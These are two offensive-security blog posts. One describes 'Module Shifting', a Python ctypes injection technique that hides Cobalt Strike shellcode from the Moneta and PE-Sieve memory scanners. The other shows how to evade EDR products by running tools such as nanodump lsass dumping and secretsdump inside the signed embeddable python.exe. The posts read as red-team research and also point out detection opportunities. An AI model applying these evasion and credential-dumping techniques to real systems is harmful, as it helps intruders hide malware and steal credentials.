If we can keep the payload functionally independent from the stomped bytes, we can restore the stomped bytes and get rid of the “Modified Code” IoC that some module stomping public implementations bring.
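The comparison behind the “Modified Code” IoC can be approximated with a byte-by-byte diff. The Python sketch below is a simplification and not Moneta’s actual logic (a real scanner also has to account for relocations and other legitimate differences); the buffers are made-up sample data.

```python
def modified_ranges(on_disk: bytes, in_memory: bytes):
    """Return [start, end) offset pairs where the two buffers differ."""
    ranges = []
    start = None
    for index, (disk_byte, mem_byte) in enumerate(zip(on_disk, in_memory)):
        if disk_byte != mem_byte and start is None:
            start = index                      # a modified run begins
        elif disk_byte == mem_byte and start is not None:
            ranges.append((start, index))      # the run ended just before
            start = None
    if start is not None:
        ranges.append((start, min(len(on_disk), len(in_memory))))
    return ranges


original = bytes(range(16))
stomped = original[:4] + b"\xcc" * 4 + original[8:]
restored = stomped[:4] + original[4:8] + stomped[8:]

while_stomped = modified_ranges(original, stomped)
after_restore = modified_ranges(original, restored)
```

Once the stomped bytes are put back, the diff is empty, which is the reason restoring them removes the IoC as long as the payload no longer depends on them.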

Module Overloading, on the other hand, requires having a PE payload living on a “hosting dll” and we cannot revert the copied bytes back to their original value, otherwise this will impair the payload execution.

However, Module Overloading can be improved by choosing the right hosting dll section where to write the payload, and by mimicking some seemingly “strange” behaviour held by windows and third party libraries that overwrite some of their very same PE section, leading to the “Modified Code IoC” with Moneta.

All these improvements led to a modified Module Stomping and Module Overloading technique that has been dubbed Module Shifting. To connect these concepts to my previous Python research I developed the PoC in Python ctypes such that it can be used dynamically with Pyramid.

Credits

A huge thank you to the amazing people that published knowledge and tools instrumental to this work:

Aleksandra Doniec (hasherezade) for Module Overloading, PE-Sieve, PE-Bear and for technical discussions
Forrest Orr for Moneta and his Memory Evasion blog series.
Kyle Avery for AceLdr
Fsecure and Bobby Cooke for their public Module Stomping implementation (1)(2)

Intro

The purpose of the post is to improve some injection techniques, so to better understand the process involved we’ll try to answer the following questions:

What’s important to know about an injection and how can we choose between the myriad of available techniques?
How can we test the stealthiness and define a benchmark?
How can we improve an injection technique?

In the realm of Offensive Cybersecurity, injection techniques play a pivotal role in various malicious activities.

These techniques involve the insertion of code or payloads into the memory space of legitimate processes, often enabling attackers to execute arbitrary actions covertly.

Among the various techniques, three main categories stand out: Code Injection, PE Injection, and Process Manipulation.

In this post, we will delve into the domain of PE Injection, focusing specifically on two advanced techniques: Module Stomping and Module Overloading. Module Stomping and Module Overloading are intriguing techniques within the realm of PE Injection due to their ability to sidestep dynamic memory allocation and rely on a fundamental operation known as LoadLibrary.

These techniques, while effective, have been scrutinized for leaving traces that can be detected by advanced security tools like Moneta. Moneta’s detection mechanism involves comparing on-disk DLL bytes with in-memory bytes, effectively flagging modified code as an Indicator of Compromise (IoC). This post addresses the challenges posed by these techniques and presents an innovative approach to enhance their stealth and effectiveness.

Injection Categories

Since our aim is to improve the stealthiness of injection techniques, we’ll try to group the injection techniques in categories, focusing on the IoCs that are most commonly left by techniques in the same group. This is by far not a comprehensive description of every injection technique, but the purpose is to provide a high-level overview so that we can better identify promising injection techniques to improve. If you need a more detailed overview, the Blackhat 2019 presentation - Process Injection Techniques: Gotta Catch Them All can be beneficial.

Code Injection

Techniques included in this group insert and execute malicious code within a target process’s memory, typically involving dynamic memory allocation. Some of the most common techniques in this group are:

Classic shellcode injection:
- Allocate memory in the target process
- Write malicious code into the allocated memory
- Create a remote thread or execute via callback functions
APC injection:
- Allocate memory in the target process
- Write malicious code into it
- Queue an APC
- Resume thread execution
Hook injection:
- Intercept API calls made by the target process
- Redirect the intercepted API calls to the malicious code
Thread Local Storage injection:
- Modify the target process’ PE header (TLS callback function)
- Execute the injected code as a TLS callback
Exception-dispatching injection:
- Allocate memory in the target process
- Write malicious code into it
- Modify the target process’ exception handler
- Trigger an exception in the target process

The most prevalent IoC for the techniques listed in this group is dynamic memory allocation, usually made through the VirtualAlloc and HeapAlloc API calls, and the subsequent changes in memory permissions (RWX, RW then RX, etc.). Some techniques also generate technique-specific IoCs, but these are very peculiar and can generally be fingerprinted by security vendors once a technique becomes public. For that reason we are mostly interested in the common IoCs shared by most of the techniques in a group, so that we have a simpler map of each injection category and of the traces left by most of its techniques.

PE Injection

Techniques included in this group inject a Portable Executable (PE) file such as dlls or exes into the address space of a running process. Some of the most common techniques in this group are:

Classic dll injection:
- Drop the dll on disk
- Allocate memory in the target process and write the malicious dll’s path into it
- Load the dll using LoadLibrary or a similar method
Reflective dll injection:
- The reflective loader is part of the malicious dll
- The loader loads and maps the malicious dll into the target process without actually calling LoadLibrary or other Windows APIs
- Resolve dependencies and perform relocations
MemoryModule:
- Similar to reflective dll injection, but the loader code is external and not embedded in the dll itself
- This technique is more flexible since it allows the loading of unmodified dlls
Module Stomping:
- Load a dll into the target process
- Overwrite the dll’s section/s with shellcode and execute it
Module Overloading:
- Load a dll into the target process
- Overwrite the loaded dll’s memory space with a malicious PE

By injecting a PE, we are requiring that PE to run on the overwritten dll’s bytes, and this would typically mean that the PE is a “final” payload that does not load or execute further stages. On the other hand, by using shellcode (i.e. Module Stomping) an attacker can craft a stealthier approach by using shellcode that loads a final payload in another area of memory. As we’ll see later in the post, this is a key property that enables some improvements in the injection technique.

Injection techniques in this group mostly leverage, or mimic, a normal dll loading operation such as LoadLibrary. This is a key element that can provide an avenue for attackers to better blend into environments while injecting.

Process Manipulation

Techniques included in this group are used to manipulate or modify the memory and execution context of running processes, libraries, or creating new processes with malicious payloads. Some of the most common techniques in this group are:

Process Hollowing:
- Create process in suspended state
- Replace memory contents with malicious executable
- Resume execution
Process doppelgänging
- Abuse NTFS transactions to load a malicious executable within the context of a legitimate process
Sideloading
- Drop dll on disk
- Abuse windows dll search order or missing dlls to load a malicious dll into a legitimate process
Thread Execution Hijacking
- Suspend a thread in the target process
- Modify instruction pointer to execute malicious code

The most prevalent IoCs generated by these techniques are alterations of the context or normal execution flow of a PE (suspended execution state, abuse of the dll search order).
While this category contains some very powerful techniques, such as sideloading, we might want to first look for techniques that mostly leverage legitimate process operations and do not alter execution flow, in order to have a better chance of blending into an environment without standing out as odd behaviour.

Improvement Strategy

Before diving into the improvement phase, we should have a proper strategy up our sleeve, since the injection technique is not a single element but part of a chain whose main moving parts are the injection technique, the loader and the payload.

The most prevalent IoC for these techniques is that the PE (dll or exe) or shellcode resides in the memory of a (legitimate) loaded dll. This leads to a mismatch between the in-memory bytes and the on-disk dll’s bytes, caused by overwriting the loaded dll’s memory space with malicious code.


Moving parts of an injection Technique

Moving Parts - Injection technique

The injection technique should not be seen as an isolated element, because its choice can be influenced by the payload or the loader. For example, if your payload to be injected is a PE, you’ll basically limit your injection options to the PE injection category. Similarly, if you choose to use an embedded loader to load a dll, you’re narrowing down to reflective dll injection.

An attacker should choose an injection technique primarily based on operational considerations. Some common drivers might be:

use an injection to emulate a predefined Threat Actor.
choose an injection that is more likely to blend into an environment.
use an injection that can bypass the security solution the attacker is up against (not necessarily blending into the environment).

We are mostly interested in blending into an environment, because this can bring the broadest operational depth. For this reason, two key features that the Injection technique should have are:

Avoidance of dynamic memory allocation (via VirtualAlloc or HeapAlloc).
Usage of a legitimate process operation

Looking for injection techniques with these characteristics, we can recall from the introductory overview that Module Stomping and Module Overloading are two injection techniques that leverage the legitimate LoadLibrary operation to avoid dynamic memory allocation, such that malicious shellcode or a PE can be written over the loaded dll’s memory space.

For this reason we chose to target Module Stomping and Module Overloading and look for ways to improve them.

Moving Parts - Loader

The purpose of the loader is to execute the injection technique itself, eventually loading and executing a payload. There are mainly three types of loaders:

embedded - the loader is part of the payload (usually a PE). For example, reflective dll injection uses an embedded loader that is coded in the dll and bootstraps the loading process of the dll itself.
external - the loader is not part of the payload, it’s typically a standalone PE that gets a shellcode, BOF or PE as input payload and kicks off the injection technique. The payload can be written within a section of the loader itself or can be downloaded/read from disk/pipe.
interpreted - this loader is coded in an interpreted language and executed by the code interpreter. This kind of loader does not need a purposely compiled PE to run and can be executed in memory by the interpreter, which needs to be present or dropped on the target.

Building upon my previous Python research, our strategy is to adopt an interpreted loader, because we want to avoid generating suspicious PE loaders, which generally have a very short life-span and can be easily fingerprinted, and to leverage the powerful evasion properties that Python brings to the game:

Python embeddable package comes with a signed interpreter that can be dropped on the target
Coding the loader using Python ctypes allows us to dynamically execute wrapped C language code via Python. We can essentially call any Windows API using Python via the signed interpreter.
Combining Python with Pyramid allows us to import Python modules in memory and execute complex operations entirely in memory.
We can avoid the usage of compiled PE for injection.
We can avoid AMSI inspection (there’s no AMSI for Python) and AV/EDR inspection of dynamic Python code (there’s no introspection for dynamic Python code).

Moving Parts - Payload

The final stage of an injection technique is to achieve payload execution, that’s essentially code to be run on a target machine. In the context of Memory Injection, payloads can come in the form of:

PE (executables or dlls)
Position Independent Code (Shellcode, BOFs, etc.)

PE payloads are usually less flexible than shellcode because of their size (PE header and sections’ overhead), and they’re also rarely used to stage further malware; instead they’re often intended as “final” payloads containing the core of the malware. Furthermore, the size constraint makes a PE an unviable candidate for injection techniques where little space is available.

On the other hand, shellcode has more flexibility and evasion properties:

Shellcode can be used to load further stage payloads (even a PE) and can be made independent from final payloads, meaning that once the shellcode has loaded and started the final payload, it can be erased without impairing the functionality of the final payload itself.
Shellcode can be shrunk (using stagers for example) to fit small space constraints.
Position Independent Code payloads can be obfuscated at the assembly level

For these reasons we’ll choose shellcode as the payload and, to make it independent from further stages, we’ll use a stageless Cobalt Strike Beacon shellcode generated with AceLdr.

AceLdr shellcode will load a copy of Beacon on the Heap and it’ll apply advanced in-memory evasion techniques. The scope of this blogpost is improving the injection technique rather than the payloads, so we’ll be focusing on the artifacts that the injection technique is leaving behind.

Testing with memory scanners

In the realm of cybersecurity, understanding and mitigating novel threats is paramount. For this purpose, great professionals like Forrest Orr and Aleksandra Doniec published Moneta and PE-Sieve respectively, two state-of-the-art publicly available memory scanners designed to detect sophisticated memory-based attacks.

Moneta excels in identifying the presence of dynamic/unknown code and suspicious characteristics of the mapped PE image regions, which are often telltale signs of an attack. On the other hand, PE-Sieve is designed to identify suspicious memory regions based on malware IoCs and uses a variety of data analysis tricks to refine its detection criteria. These tools were originally designed for defenders, but can also be used by attackers to improve their craft.

When we delve into the intricacies of memory injection techniques like Module stomping and Module overloading, both these tools become instrumental. By utilizing these scanners, we can identify the improvement opportunities in these injection techniques, making it possible to enhance their efficiency when deploying shellcode and ensuring they remain undetected by modern defense mechanisms.

Having these tools at hand is also beneficial in finding some weird common behaviours that we can use to our advantage to better blend in. For example, running Moneta on all processes on a Windows 10 operating system and inspecting its results can lead to interesting findings.

In fact, some .NET dlls are known to self-modify their .text section, leading to Moneta’s “Modified Code” IoC. Third-party apps like Discord and Signal show the same behaviour, and it’s interesting to note that the number of bytes they overwrite is bigger in the latter cases.

Generally, the more bytes a dll self-modifies, the better, since an attacker can smuggle in a bigger payload and mimic the exact same behaviour of the legitimate applications. In particular, security solutions would probably whitelist this behaviour, otherwise they would be overwhelmed by false positives and customers would be unhappy.


False Positives - self-modifying behaviours done by legitimate applications

Starting Point - PythonMemoryModule

After defining the strategy, we should start somewhere and iterate to improve. Our starting point is the MemoryModule technique, that is instrumental to the Module Overloading injection that we’ll target later on.

MemoryModule is a technique first published by Joachim Bauch and is used to map and load a dll in memory without calling the LoadLibrary Windows API. This is achieved by executing the same operations done by the Windows Loader when issuing the LoadLibrary API call. The following image depicts its basic steps:


MemoryModule technique

In order to use the MemoryModule technique with a Python interpreted loader, the technique has been ported to Python ctypes and is available on my PythonMemoryModule github project.

Combining the PythonMemoryModule project with Pyramid, we can achieve the injection of a Cobalt Strike dll with the MemoryModule technique using a fully in-memory Python loader. In the following video we’ll demonstrate the injection and the scanning results of Moneta and PE-Sieve on the injected process.

In summary, PythonMemoryModule used with a Cobalt Strike dll is producing the following IoCs:


IoCs generated by MemoryModule and Cobalt Strike dll Artifact

The Abnormal Private executable Memory IoC detected at 0x6bac1000 is due to the MemoryModule injection technique that copied the .text section at that address and changed its permissions to RX subsequently.

The other abnormal private executable memory IoC is generated because the Cobalt Strike dll is self-bootstrapping Beacon in another area of memory (0x1c575a90000), so here we basically have two PEs in memory that are generating IoCs but only one is running Beacon. Dynamic memory allocation would necessarily lead to the “Abnormal Private Executable Memory” IoC at some point, so we want to get rid of this IoC in the first place.

Module Overloading and Module Stomping techniques can provide us a way to avoid dynamic memory allocation.

Module Overloading

The Module Overloading technique, first published by Aleksandra Doniec, aims at avoiding dynamic memory allocation by first loading a hosting dll using the LoadLibrary API, overwriting it with malicious content (a PE), and loading that content using the same Memory Module steps we saw earlier.

In this way the legitimate hosting dll is loaded via LoadLibrary API, but malicious content is loaded using the Memory Module technique over the memory space of the hosting dll that is legitimately loaded. This clever mix makes the Module Overloading Technique.

At a high level, Module Overloading steps (as implemented by Aleksandra Doniec) look like this:


Module Overloading injection technique

Even though this technique is stealthier than Memory Module, we still have some IoCs to work on. Specifically, Moneta will identify “Modified Code” and “Modified Header” as IoCs after executing the injection.


Module Overloading IoCs

This result stems from the fact that we overwrote the hosting dll’s memory space with malicious content. When Moneta and PE-Sieve compare the on-disk bytes of the hosting dll with its in-memory counterpart, the two will mismatch and fire the “Modified Code” and “Replaced” IoCs if the overwrite happens to touch the hosting dll’s mapped .text section.
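The byte-by-byte comparison described above can be pictured with a minimal Python sketch. It assumes both buffers are already aligned views of the same section, and the helper name `find_modified_ranges` is hypothetical; real scanners such as Moneta and PE-Sieve also have to account for relocations and other legitimate loader changes, which this sketch ignores.

```python
def find_modified_ranges(disk_bytes: bytes, memory_bytes: bytes) -> list[tuple[int, int]]:
    """Return (offset, length) runs where the in-memory copy differs from disk."""
    ranges = []
    start = None
    limit = min(len(disk_bytes), len(memory_bytes))
    for offset in range(limit):
        if disk_bytes[offset] != memory_bytes[offset]:
            if start is None:
                start = offset          # a new mismatching run begins here
        elif start is not None:
            ranges.append((start, offset - start))
            start = None
    if start is not None:               # run extends to the end of the buffer
        ranges.append((start, limit - start))
    return ranges


if __name__ == "__main__":
    on_disk = bytes(range(16))          # stand-in for a section read from disk
    in_memory = bytearray(on_disk)
    in_memory[4:8] = b"\xcc" * 4        # simulate four overwritten bytes
    print(find_modified_ranges(on_disk, bytes(in_memory)))
```

Any non-empty result over an executable section is, conceptually, what surfaces as a "Modified Code" style indicator.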

The “Modified Header” IoC is generated because this technique implementation starts overwriting from the very top of the hosting dll memory space, thus overwriting the PE header that commonly happens to reside in the first 0x1000 bytes.

All things considered, we got rid of the MemoryModule’s “Abnormal Private Executable memory” IoC but we introduced other IoCs related to the hosting dll byte-by-byte comparison between on-disk and memory space.

However, we can improve this outcome a bit by introducing the Module Stomping injection technique.

Module Stomping

Module Stomping provides the same benefit as Module Overloading: it avoids dynamic memory allocation by loading a hosting dll to be used as “disposable space” onto which malicious content is written. The main difference is that Module Stomping is much simpler than Module Overloading because its aim is to write and execute shellcode, not a PE. So we don’t need the Windows Loader steps that both Memory Module and Module Overloading adopted; with Module Stomping we just need to write the shellcode and execute it directly.

Some Module Stomping implementations have been made publicly available by F-Secure and Bobby Cooke.

At a high level, Module Stomping steps look like this:


Module Stomping injection technique

After injecting via Module Stomping using wmp.dll as hosting dll and writing the malicious shellcode over the .rsrc section we obtain the IoCs depicted in the following image.


Module Stomping IoCs

We gradually reduced the generated IoCs, but “Modified Code” is still haunting us because it’s a trademark of both the Module Stomping and Module Overloading techniques. The “inconsistent +x between disk and memory” IoC is caused by the shellcode written over the .rsrc section and the RX permission set afterwards. Moneta is complaining about the fact that the .rsrc section originally does not have executable permission.
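The permission mismatch can be expressed as a small check. This is only a sketch of the idea, not Moneta's implementation: the function name is hypothetical, while the constants are the documented PE section flag `IMAGE_SCN_MEM_EXECUTE` and the Windows `PAGE_EXECUTE*` protection values.

```python
# Documented PE section characteristic flag for executable sections.
IMAGE_SCN_MEM_EXECUTE = 0x20000000

# Documented Windows page protections that grant execute access:
# PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY.
EXECUTABLE_PAGE_PROTECTIONS = 0x10 | 0x20 | 0x40 | 0x80


def has_inconsistent_exec(section_characteristics: int, page_protect: int) -> bool:
    """True when memory is executable but the on-disk section is not."""
    executable_on_disk = bool(section_characteristics & IMAGE_SCN_MEM_EXECUTE)
    executable_in_memory = bool(page_protect & EXECUTABLE_PAGE_PROTECTIONS)
    return executable_in_memory and not executable_on_disk


if __name__ == "__main__":
    RSRC_FLAGS = 0x40000040   # typical .rsrc: initialized data, readable
    TEXT_FLAGS = 0x60000020   # typical .text: code, executable, readable
    PAGE_EXECUTE_READ = 0x20
    print(has_inconsistent_exec(RSRC_FLAGS, PAGE_EXECUTE_READ))
    print(has_inconsistent_exec(TEXT_FLAGS, PAGE_EXECUTE_READ))
```

A data section such as .rsrc mapped as RX trips the check, whereas a .text section with the same protection does not.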

Both of these IoCs can be finally avoided with some improvements that are implemented in a technique dubbed “Module Shifting”.

Module Shifting

So far we have observed how some injections behave in memory and gained a bit of knowledge of how and why memory scanners identify suspicious memory anomalies.

We can use this knowledge to our advantage by asking ourselves a few what-if questions:

what if the writing of the shellcode is shifted to a section of a dll that is normally self-modifying the exact section?
what if we inject using a self-modifying dll as host with enough space to write our shellcode and we apply some padding to look exactly as the self-modifying behaviour?
what if we use a shellcode payload that is functionally independent from further stages and we overwrite the executed shellcode with the dll’s original bytes?

After experimenting and answering all these questions we came up with the Module Shifting technique that aims at improving Module Stomping and Module Overloading by providing the following advantages:

Avoids “Modified Code” between virtual memory and the on-disk dll, leaving close to zero suspicious memory artifacts and getting no indicators on Moneta and PE-Sieve
Better blending into common False Positives by choosing the target section and using padding
Can be used with PE and shellcode payloads
Implemented in Python ctypes – full-in-memory execution available

At a high level, Module Shifting steps look like this:


Module Shifting Injection technique

The restore operation is quite simple and is done after executing the initial shellcode.

# Restore operation: make the stomped region writable again,
# then copy the saved original dll bytes back over the shellcode.
        VirtualProtect(
                cast(tgtaddr, c_void_p),
                mod_bytes_size,
                PAGE_READWRITE,
                byref(oldProtect))
        memmove(cast(tgtaddr, c_void_p), self.targetsection_backupbuffer, mod_bytes_size)

After setting the shellcode memory area permissions to RW, the content of targetsection_backupbuffer, which holds a copy of the original dll bytes for the exact same position and length as the shellcode, gets written over the shellcode. This effectively restores the stomped bytes to the original ones, leaving no traces of the written shellcode. In this way, Moneta and PE-Sieve will do a byte-by-byte comparison as usual and will find no mismatch between the hosting dll’s on-disk bytes and the in-memory ones.

There won’t be any inconsistent executable permissions either, because we set the permissions back to the section’s original values.

Following is a demonstration of a self-process injection with the Module Shifting technique using a Cobalt Strike Beacon shellcode generated with AceLdr. After executing Moneta and PE-Sieve we get no IoCs detected because there are no artifacts left by the Module Shifting injection technique (the payload is not our focus), which was our initial aim.

Even though Moneta and PE-Sieve did not generate IoCs, a runtime inspection scanner could identify some anomalies. In fact, writing a 307.2 kB payload over the .text section of mscorlib.ni.dll can be a malicious indicator, because the common behaviour for this dll is to overwrite 45 kB.

However, this anomaly could not be spotted by scanners without runtime inspection capabilities, because Module Shifting does not leave artifacts floating around after having restored the stomped bytes.
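From the defender's side, the size anomaly above suggests a simple baseline check. The sketch below is only an illustration: the function name, the baseline table and the tolerance factor are assumptions, and the only figures taken from this post are the 45 kB baseline and the 307.2 kB payload (treated as 1 kB = 1000 bytes).

```python
# Hypothetical baseline of bytes a module normally self-modifies in its .text section.
BASELINE_MODIFIED_BYTES = {"mscorlib.ni.dll": 45_000}


def exceeds_baseline(module: str, observed_bytes: int, tolerance: float = 1.5) -> bool:
    """Flag a module whose modified byte count is well above its usual value.

    Modules without a known baseline are flagged on any modification.
    The tolerance factor is an arbitrary illustrative choice.
    """
    baseline = BASELINE_MODIFIED_BYTES.get(module, 0)
    return observed_bytes > baseline * tolerance


if __name__ == "__main__":
    print(exceeds_baseline("mscorlib.ni.dll", 45_000))    # usual behaviour
    print(exceeds_baseline("mscorlib.ni.dll", 307_200))   # payload-sized overwrite
```

Such a check only helps if the modification is observed while it is in place, which is exactly why runtime inspection is needed here.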


Detection Opportunities

Outro

Concluding this exploration, we dove deep into the intricacies of injection techniques, honing in on Module Stomping and Module Overloading as part of the PE injection arsenal.

The objective was clear: to improve these techniques, aiming for more operational stealthiness. While traditional approaches like Module Stomping faced challenges with the “Modified Code” IoC due to the stomped code’s residence in the hosting dll, we’ve delineated a strategy to finally circumvent these obstacles. The newly introduced Module Shifting technique encapsulates these enhancements, offering a more nuanced way to operate with greater stealthiness.

The key takeaways for this blog post are:

Injection Techniques have several moving parts
Python can be used as a loader with Pyramid and ctypes to dynamically call windows APIs
Memory IoCs can be greatly reduced with a proper injection strategy
Memory scanners can be used by attackers to find False Positives candidates to blend in
Functionally-independent Shellcode payloads once injected and executed can be overwritten with original dll content
ModuleShifting improvements can be applied also to other injection techniques

The future of injection techniques is always evolving, and the landscape will continually shift towards greater sophistication and precision.

Living-Off-the-Blindspot - Operating into EDRs’ blindspot

2022-09-01T00:00:00-04:00

TL;DR
Intro
EDRs Defenses
Bypass Strategy
Leveraging Python
Conclusions
How to defend from this

The topic has been presented at DEFCON30 - Adversary village (deck is available here)

TL;DR

Python provides some key properties that effectively create a blindspot for EDR detection, namely:

Python’s wide usage implies that a varied baseline telemetry exists for the Python interpreter, which natively calls different APIs depending on the Python code being run. This can make it harder for EDR vendors to spot anomalies coming from python.exe or pythonw.exe.
Python lacks transparency (ref. PEP-578) for dynamic code executed from stock python.exe and pythonw.exe binaries.
Python Foundation officially provides a “Windows embeddable package” that can be used to run Python with a minimal environment without installation. The package comes with signed binaries.

An attacker could leverage the Python official Windows Embeddable zip package dropping it on disk and using the signed binary python.exe (or pythonw.exe) to execute a wide range of post exploitation tasks.

With this in mind, a tool named Pyramid has been developed to demonstrate that one can bring useful capabilities into python.exe and operate while successfully evading EDR detection. Pyramid can execute the following techniques straight from python.exe or pythonw.exe:

dynamically importing and executing Python-BloodHound and secretsdump.
executing BOF (dumping lsass with nanodump).
creating SSH local port forward to tunnel a C2 Agent.

The tool has been successfully tested against several EDRs, demonstrating that a blindspot is indeed present and it is possible to execute a range of capabilities from it. This technique has been dubbed Living-off-The-Blindspot.

Intro

EDRs are commonly encountered by red teamers during engagements and it is vital to know some concepts on how to operate under their scrutiny without being detected.

In an effort to find a way around several EDRs, the bypass problem has been analyzed looking in a more holistic way at the current defenses put in place by EDRs in order to find a novel strategy that could enable operating in blind spots, rather than bypassing a single defense mechanism.

EDRs Defenses

EDRs deploy several defenses in order to detect and respond to threats. The common requirement for all the defenses is visibility, since you can’t protect what you can’t see. Visibility can be understood as the EDR’s capability to properly process information aimed at gaining context for a specific status/action/language/technique on a system or network. Information can come from OS sources (such as AMSI or ETW) or via proprietary techniques.

The following paragraphs provide some key concepts for every major Defense that must be taken into consideration while thinking about a bypass strategy. This post is not meant to be an extensive explanation of each defensive measure, since there are much better resources already available online (check here). Bear in mind that Defenses do not usually work in silos: information is shared among them in order to contribute to the detection of malicious activity.

Kernel Callbacks and Usermode Hooking

Two common ways of increasing visibility for EDRs are Kernel Callbacks and Usermode Hooking.

Kernel Callbacks are commonly used to get information on processes and loaded images and to inject the EDR’s dll into newly created processes (see example in the image below). The PsSetCreateProcessNotifyRoutine routine registers a Kernel Callback such that when a specific action occurs (i.e. process creation) the routine will send a pre or post-action notification to the Driver, which will then execute its callback. In the example below the Kernel driver instructs the EDR process to inject the EDR’s dll into the newly created process, setting the groundwork for usermode hooking.


Kernel Callback example

The EDR’s dll is then used mainly to perform Usermode Hooking, patching ntdll.dll and inspecting specific Windows API calls made by processes in order to take some action if a call is deemed malicious.


Usermode Hooking example

Usermode hooking has at least two big limitations:

EDRs do not hook every Windows API call, for performance reasons; instead they rely on hooking the APIs that are most commonly abused by malware.
Hooking is also done in usermode, so every usermode program can theoretically undo the hooking.

Memory Scanning

Memory scanning techniques look for patterns in the code and data of processes. From an EDR point of view they are resource intensive, so one of the most common approaches is to do timed or triggered scans based on events/detections/analyst actions.

From an attacker perspective, memory scans are dangerous because even a fileless payload, once it is executing its routines, has to be in cleartext in memory. Recently, the offensive security community came up with techniques (such as ShellcodeFluctuation and Sleep mask for Cobalt Strike) to mitigate the risk of detection in memory. They basically obfuscate the code in memory while a payload is “sleeping” - i.e. not executing tasks and waiting to fetch commands from the C2 after a certain time.

However, the risk is still relevant while the payload is executing tasks and if a memory scan is triggered by malicious operations done by the payload, this may very well lead to a memory dump or a pattern matching between the cleartext version of the payload code and a set of known-bad signatures.
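The pattern matching step mentioned above can be sketched in a few lines of Python. This is a deliberately naive illustration with a hypothetical helper name and a made-up placeholder signature; real scanners typically rely on rule engines and wildcards rather than plain substring search.

```python
def scan_buffer(buffer: bytes, signatures: dict[str, bytes]) -> list[tuple[str, int]]:
    """Return (signature_name, offset) for every occurrence of each signature."""
    hits = []
    for name, pattern in signatures.items():
        offset = buffer.find(pattern)
        while offset != -1:
            hits.append((name, offset))
            offset = buffer.find(pattern, offset + 1)   # continue after this hit
    return hits


if __name__ == "__main__":
    # Placeholder signature and buffer, purely illustrative.
    signatures = {"demo_rule": b"DEMO-SIG"}
    memory_dump = b"\x00" * 8 + b"DEMO-SIG" + b"\x00" * 4 + b"DEMO-SIG"
    print(scan_buffer(memory_dump, signatures))
```

The scan only succeeds when the bytes are in cleartext at scan time, which is why the timing of a triggered scan matters so much.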

ML based detections

Machine Learning is an entire discipline and I don’t dare to cover it extensively since I am no expert at all and there are many other better resources elsewhere. However, we can focus on some key-concepts that are employed in ML detections that can be very useful in defining a bypass strategy. Starting with the very basics, we can say that Machine Learning can detect variant malware files that can evade signature-based detection.

Peculiar malware characteristics are translated into “features” and used for training Machine Learning models. Features can be static (identifiable without executing samples) or dynamic (extracted at runtime). Basically, to detect malware using Machine Learning, one can collect a large amount of malware and goodware samples, extract the features, train the ML system to recognize malware, then test the approach with real samples.

The features play an important role during the process because they are related to sample properties. Some common features to determine if a file is good or bad are if the file is digitally signed or if it has been seen on more than 100 network workstations. On the other hand, features used to determine if a file is bad could be the presence of malformed or encrypted data and a suspicious series of API calls made by the binary (dynamic feature).

The key concept here is that features have a “weight” into the decision process of a ML model (assigning weights to features is one of the ML training purposes). In layman terms, this means that features with a higher weight might bend the ML model decision toward malware or goodware more than other lower weight features. Security vendors do not publish weights nor the features used by their ML models, but as attackers we can think about at least one feature that can help evading detections: Digital Signature. It is in fact true that malware developers and operators often try to sign their malware to evade security solutions because this property is often used as a goodware feature by ML models and probably with a pretty good weight.
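To make the idea of feature weights concrete, here is a toy scoring sketch. Everything in it is an assumption made for illustration: the feature names, the weights and the logistic form are not taken from any vendor's model, since those are not public.

```python
import math

# Hypothetical weights: negative values push toward goodware, positive toward malware.
WEIGHTS = {
    "digitally_signed": -2.5,
    "widely_seen": -1.5,
    "encrypted_data": 2.0,
    "suspicious_api_sequence": 2.5,
}


def malware_score(features: dict[str, bool], bias: float = 0.0) -> float:
    """Return a score in (0, 1); higher means more malware-like."""
    z = bias + sum(w for name, w in WEIGHTS.items() if features.get(name, False))
    return 1.0 / (1.0 + math.exp(-z))


if __name__ == "__main__":
    unsigned = {"encrypted_data": True, "suspicious_api_sequence": True}
    signed = dict(unsigned, digitally_signed=True, widely_seen=True)
    print(round(malware_score(unsigned), 3))
    print(round(malware_score(signed), 3))
```

With identical suspicious features, the signed and widely seen sample ends up with a noticeably lower score, which is the effect the paragraph above describes.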

Another dynamic feature that can be abused by properly choosing the binary under which to operate is the API call sequence. This would work well for malware samples but

what about malicious code that gets executed in-memory by an interpreter?

In that case, the API call sequence made by the interpreter binary can be virtually anything because it depends on the code run by the interpreter. How are security vendors handling that? I don’t have exact answers to these questions but we can test EDRs’ behaviour and draw some conclusions.

IoCs and IoAs

One definition of IoC is “an object or activity that, observed on a network or on a device, indicates a high probability of unauthorized access to the system”. In other words, IoCs are signatures of known-bad properties or actions performed by malware. IoCs are useful for forensic intelligence after an attack has occurred, but they can also produce false positives and their effectiveness is limited to techniques and malware currently known by defenders.

On the other hand, an Indicator of Attack (IoA) can be defined as an indicator stating that an attack is ongoing. The indicator results from the correlation of actions deemed malicious made by an attacker and the systems/binaries involved. IoAs are not as useful as IoCs for forensic purposes but can be much more useful in identifying an ongoing attack.
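The difference between the two can be sketched as a lookup versus a correlation. The function names, event names and hash value below are hypothetical and only meant to illustrate the distinction: an IoC check matches a known-bad artifact, while an IoA check looks for an ordered series of actions.

```python
def matches_ioc(file_sha256: str, known_bad_hashes: set[str]) -> bool:
    """IoC style: exact match against a set of known-bad artifacts."""
    return file_sha256.lower() in known_bad_hashes


def matches_ioa(observed_events: list[str], attack_pattern: list[str]) -> bool:
    """IoA style: the pattern's steps occur in order within the observed events."""
    remaining = iter(observed_events)
    # 'step in remaining' consumes the iterator up to the match, enforcing order.
    return all(step in remaining for step in attack_pattern)


if __name__ == "__main__":
    known_bad = {"ab" * 32}                      # placeholder hash value
    print(matches_ioc("AB" * 32, known_bad))

    events = ["process_start", "file_read", "remote_alloc", "net_connect", "remote_thread"]
    print(matches_ioa(events, ["remote_alloc", "remote_thread"]))
    print(matches_ioa(events, ["remote_thread", "remote_alloc"]))
```

The IoA check does not need to know the artifact in advance, only the shape of the behaviour, which is why it is better suited to spotting ongoing attacks.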

Bypass Strategy

Knowing some, although very basic, key concepts on common Defenses put in place by EDRs, can help shaping a bypass strategy. Abstracting the technical details and digesting the information keeping an offensive mindset, we could summarize the previously listed Defenses in the following statements:

Usermode Hooking is applied only to certain APIs and can be circumvented from usermode.
Kernel Callbacks cannot be circumvented from usermode but are mainly used to provide visibility on newly created process, loaded images and to trigger EDR’s DLL injection into newly created processes.
Executing C2 payloads will increase the risk for detection by memory scans and may trigger IoCs.
ML-based detections can assign a bad score to unknown and unsigned binaries, and a better score to signed and widely used binaries.
